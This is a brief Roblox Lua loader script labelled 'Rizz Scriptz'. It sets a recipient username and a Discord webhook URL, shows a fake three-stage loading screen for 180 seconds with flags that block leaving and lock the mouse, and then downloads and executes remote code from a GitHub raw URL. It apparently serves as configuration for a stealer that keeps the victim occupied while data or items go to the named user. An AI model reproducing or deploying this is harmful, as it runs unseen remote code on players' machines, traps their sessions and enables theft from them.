UserName = "nd_2mx"
Webhook = "https://discord.com/api/webhooks/1105081861987909725/__BOrpiEys_dKagR1pntTHoaAXyWX38nsXmlntwRIVEMkP3wD9dG21oJpx3QznfswNym"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
